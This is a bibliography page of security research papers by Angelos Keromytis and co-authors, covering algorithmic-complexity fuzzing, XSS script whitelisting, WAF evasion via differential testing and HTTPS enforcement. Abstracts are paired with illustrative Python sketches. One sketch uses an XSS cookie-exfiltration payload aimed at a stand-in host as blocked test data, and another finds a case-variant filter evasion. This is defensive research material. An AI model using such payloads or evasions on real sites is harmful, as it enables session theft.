Biblio

Filters: Author is Keromytis, Angelos D.
Petsios, Theofilos, Zhao, Jason, Keromytis, Angelos D., Jana, Suman. 2017. SlowFuzz: Automated Domain-Independent Detection of Algorithmic Complexity Vulnerabilities. Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. 2155–2168.
Algorithmic complexity vulnerabilities occur when the worst-case time/space complexity of an application is significantly higher than the respective average case for particular user-controlled inputs. When such conditions are met, an attacker can launch Denial-of-Service attacks against a vulnerable application by providing inputs that trigger the worst-case behavior. Such attacks have been known to have serious effects on production systems, take down entire websites, or lead to bypasses of Web Application Firewalls. Unfortunately, existing detection mechanisms for algorithmic complexity vulnerabilities are domain-specific and often require significant manual effort. In this paper, we design, implement, and evaluate SlowFuzz, a domain-independent framework for automatically finding algorithmic complexity vulnerabilities. SlowFuzz automatically finds inputs that trigger worst-case algorithmic behavior in the tested binary. SlowFuzz uses resource-usage-guided evolutionary search techniques to automatically find inputs that maximize computational resource utilization for a given application. We demonstrate that SlowFuzz successfully generates inputs that match the theoretical worst-case performance for several well-known algorithms. SlowFuzz was also able to generate a large number of inputs that trigger different algorithmic complexity vulnerabilities in real-world applications, including various zip parsers used in antivirus software, regular expression libraries used in Web Application Firewalls, as well as hash table implementations used in Web applications. In particular, SlowFuzz generated inputs that achieve 300-times slowdown in the decompression routine of the bzip utility, discovered regular expressions that exhibit matching times exponential in the input size, and also managed to automatically produce inputs that trigger a high number of collisions in PHP's default hashtable implementation.
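For intuition, the core search idea can be sketched as a small hill-climbing loop: mutate inputs, measure a resource proxy for each candidate, and keep whatever maximizes it. The instrumented insertion sort, the byte-flip mutator, and all names below are illustrative stand-ins for the example, not the SlowFuzz implementation, which works on instrumented binaries.

    import random

    def insertion_sort_moves(data):
        # Toy target: counts element moves during insertion sort, standing in
        # for the resource-usage feedback (e.g., instruction counts) that the
        # paper collects from instrumented binaries.
        a, moves = list(data), 0
        for i in range(1, len(a)):
            j = i
            while j > 0 and a[j - 1] > a[j]:
                a[j - 1], a[j] = a[j], a[j - 1]
                j -= 1
                moves += 1
        return moves

    def mutate(data):
        # Single random byte mutation, a deliberately crude evolutionary operator.
        data = list(data)
        data[random.randrange(len(data))] = random.randrange(256)
        return bytes(data)

    def slow_input_search(target, seed, generations=2000):
        # Keep whichever mutant maximizes the measured resource usage.
        best, best_cost = seed, target(seed)
        for _ in range(generations):
            candidate = mutate(best)
            cost = target(candidate)
            if cost > best_cost:
                best, best_cost = candidate, cost
        return best, best_cost

    if __name__ == "__main__":
        seed = bytes(random.randrange(256) for _ in range(64))
        _, evolved_cost = slow_input_search(insertion_sort_moves, seed)
        print(f"seed cost: {insertion_sort_moves(seed)}, evolved cost: {evolved_cost}")

Running the sketch shows the evolved input costing noticeably more element moves than the random seed, mirroring the slowdown-maximizing behavior described in the abstract.
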
Mitropoulos, Dimitris, Stroggylos, Konstantinos, Spinellis, Diomidis, Keromytis, Angelos D. 2016. How to Train Your Browser: Preventing XSS Attacks Using Contextual Script Fingerprints. ACM Trans. Priv. Secur. 19:2:1–2:31.

Cross-Site Scripting (XSS) is one of the most common web application vulnerabilities. It is therefore sometimes referred to as the “buffer overflow of the web.” Drawing a parallel from the current state of practice in preventing unauthorized native code execution (the typical goal in a code injection), we propose a script whitelisting approach to tame JavaScript-driven XSS attacks. Our scheme involves a transparent script interception layer placed in the browser’s JavaScript engine. This layer is designed to detect every script that reaches the browser, from every possible route, and compare it to a list of valid scripts for the site or page being accessed; scripts not on the list are prevented from executing. To avoid the false positives caused by minor syntactic changes (e.g., due to dynamic code generation), our layer uses the concept of contextual fingerprints when comparing scripts. Contextual fingerprints are identifiers that represent specific elements of a script and its execution context. Fingerprints can be easily enriched with new elements, if needed, to enhance the proposed method’s robustness. The list can be populated by the website’s administrators or a trusted third party. To verify our approach, we have developed a prototype and tested it successfully against an extensive array of attacks that were performed on more than 50 real-world vulnerable web applications. We measured the browsing performance overhead of the proposed solution on eight websites that make heavy use of JavaScript. Our mechanism imposed an average overhead of 11.1% on the execution time of the JavaScript engine. When measured as part of a full browsing session, and for all tested websites, the overhead introduced by our layer was less than 0.05%. When script elements are altered or new scripts are added on the server side, a new fingerprint generation phase is required. To examine the temporal aspect of contextual fingerprints, we performed a short-term and a long-term experiment based on the same websites. The former showed that over a short period (10 days), for seven of eight websites, the majority of valid fingerprints stayed the same (more than 92% on average). The latter, though, indicated that in the long run the number of fingerprints that remain unchanged decreases. Both experiments can be seen as one of the first attempts to study the feasibility of a whitelisting approach for the web.
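A minimal sketch of the whitelisting idea follows. The fingerprint construction, the ScriptWhitelist class, and the example URLs are hypothetical simplifications for illustration; the paper's interception layer sits inside the browser's JavaScript engine and uses richer contextual elements than a plain hash.

    import hashlib

    def contextual_fingerprint(script_source, origin, dom_context):
        # Illustrative fingerprint: a hash over normalized script text plus a
        # couple of contextual elements. The paper's fingerprints are richer
        # and are computed inside the JavaScript engine.
        normalized = " ".join(script_source.split())
        material = f"{origin}|{dom_context}|{normalized}".encode()
        return hashlib.sha256(material).hexdigest()

    class ScriptWhitelist:
        # Execute a script only if its contextual fingerprint is on the list.
        def __init__(self, valid_fingerprints):
            self.valid = set(valid_fingerprints)

        def should_execute(self, script_source, origin, dom_context):
            return contextual_fingerprint(script_source, origin, dom_context) in self.valid

    # The site operator (or a trusted third party) publishes fingerprints for
    # the site's legitimate scripts; anything not on the list is blocked.
    trusted = contextual_fingerprint("console.log('hello');", "https://example.com", "inline")
    whitelist = ScriptWhitelist([trusted])
    assert whitelist.should_execute("console.log('hello');", "https://example.com", "inline")
    assert not whitelist.should_execute(
        "document.location='http://evil.test/?c='+document.cookie",
        "https://example.com", "inline")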

Argyros, George, Stais, Ioannis, Jana, Suman, Keromytis, Angelos D., Kiayias, Aggelos. 2016. SFADiff: Automated Evasion Attacks and Fingerprinting Using Black-box Differential Automata Learning. Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 1690–1701.

Finding differences between programs with similar functionality is an important security problem, as such differences can be used for fingerprinting or creating evasion attacks against security software like Web Application Firewalls (WAFs), which are designed to detect malicious inputs to web applications. In this paper, we present SFADIFF, a black-box differential testing framework based on Symbolic Finite Automata (SFA) learning. SFADIFF can automatically find differences between a set of programs with comparable functionality. Unlike existing differential testing techniques, instead of searching for each difference individually, SFADIFF infers SFA models of the target programs using black-box queries and systematically enumerates the differences between the inferred SFA models. All differences between the inferred models are checked against the corresponding programs. Any difference between the models that does not result in a difference between the corresponding programs is used as a counterexample for further refinement of the inferred models. SFADIFF's model-based approach, unlike existing differential testing tools, also supports fully automated root cause analysis in a domain-independent manner. We evaluate SFADIFF in three different settings for finding discrepancies between: (i) three TCP implementations, (ii) four WAFs, and (iii) HTML/JavaScript parsing implementations in WAFs and web browsers. Our results demonstrate that SFADIFF is able to identify and enumerate the differences systematically and efficiently in all these settings. We show that SFADIFF is able to find differences not only between different WAFs but also between different versions of the same WAF. SFADIFF is also able to discover three previously unknown differences between the HTML/JavaScript parsers of two popular WAFs (PHPIDS 0.7 and Expose 2.4.0) and the corresponding parsers of Google Chrome, Firefox, Safari, and Internet Explorer. We confirm that all these differences can be used to evade the WAFs and launch successful cross-site scripting attacks.
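For intuition, the sketch below shows plain black-box differential testing between two toy WAF-like filters; SFADiff's contribution is to replace this brute-force input enumeration with learned SFA models whose differences are enumerated symbolically and refined via counterexamples. The filter functions and the alphabet are invented for the example.

    from itertools import product

    # Two toy WAF-like filters with deliberately different parsing behaviour;
    # they stand in for the black-box programs being compared.
    def waf_a(payload):
        # Blocks any payload containing a '<script' tag, case-insensitively.
        return "<script" in payload.lower()

    def waf_b(payload):
        # Blocks '<script' only when it is written entirely in lowercase.
        return "<script" in payload

    def enumerate_differences(prog_a, prog_b, alphabet, max_len):
        # Brute-force stand-in for SFADiff's difference enumeration, which is
        # performed on learned SFA models rather than on raw inputs.
        for length in range(1, max_len + 1):
            for chars in product(alphabet, repeat=length):
                candidate = "".join(chars)
                if prog_a(candidate) != prog_b(candidate):
                    yield candidate

    if __name__ == "__main__":
        alphabet = ["<", "s", "S", "c", "r", "i", "p", "t"]
        first_diff = next(enumerate_differences(waf_a, waf_b, alphabet, max_len=8))
        # A payload blocked by one filter but not the other, i.e. a potential
        # evasion candidate ('<Script' slips past the case-sensitive filter).
        print("discrepancy found:", first_diff)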

Sivakorn, Suphannee, Keromytis, Angelos D., Polakis, Jason. 2016. That's the Way the Cookie Crumbles: Evaluating HTTPS Enforcing Mechanisms. Proceedings of the 2016 ACM on Workshop on Privacy in the Electronic Society. 71–81.

Recent incidents have once again brought the topic of encryption into public discourse, while researchers continue to demonstrate attacks that highlight the difficulty of implementing encryption even without the presence of "backdoors". However, apart from the threat of implementation flaws in encryption libraries, another significant threat arises when web services fail to enforce ubiquitous encryption. A recent study explored this phenomenon in popular services, and demonstrated how users are exposed to cookie hijacking attacks with severe privacy implications. Many security mechanisms purport to eliminate this problem, ranging from server-controlled options such as HSTS to user-controlled options such as HTTPS Everywhere and other browser extensions. In this paper, we create a taxonomy of available mechanisms and evaluate how they perform in practice. We design an automated testing framework for these mechanisms, and evaluate them using a dataset of 30 days of HTTP requests collected from the public wireless network of our university's campus. We find that all mechanisms suffer from implementation flaws or deployment issues and argue that, as long as servers continue to lack support for ubiquitous encryption across their entire domain (including all subdomains), no mechanism can effectively protect users from cookie hijacking and information leakage.
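The kinds of gaps the evaluation targets can be illustrated with a simplified header check. The function and the sample response metadata below are a hypothetical sketch, not the paper's automated testing framework, which exercises real mechanisms and browser extensions against live traffic.

    def audit_https_enforcement(response_headers, set_cookie_values):
        # Flag common gaps that leave session cookies exposed to hijacking.
        findings = []

        hsts = response_headers.get("Strict-Transport-Security", "")
        if not hsts:
            findings.append("no HSTS header: the first plain-HTTP request can be intercepted")
        elif "includesubdomains" not in hsts.lower():
            findings.append("HSTS without includeSubDomains: subdomain requests may leak cookies")

        for cookie in set_cookie_values:
            attributes = [part.strip().lower() for part in cookie.split(";")]
            name = attributes[0].split("=", 1)[0]
            if "secure" not in attributes:
                findings.append(f"cookie '{name}' lacks the Secure flag: it is sent over plain HTTP")

        return findings

    # Hypothetical response metadata: HSTS without includeSubDomains and a
    # session cookie missing the Secure flag, both of which enable hijacking.
    print(audit_https_enforcement(
        {"Strict-Transport-Security": "max-age=31536000"},
        ["sessionid=abc123; Path=/; HttpOnly"],
    ))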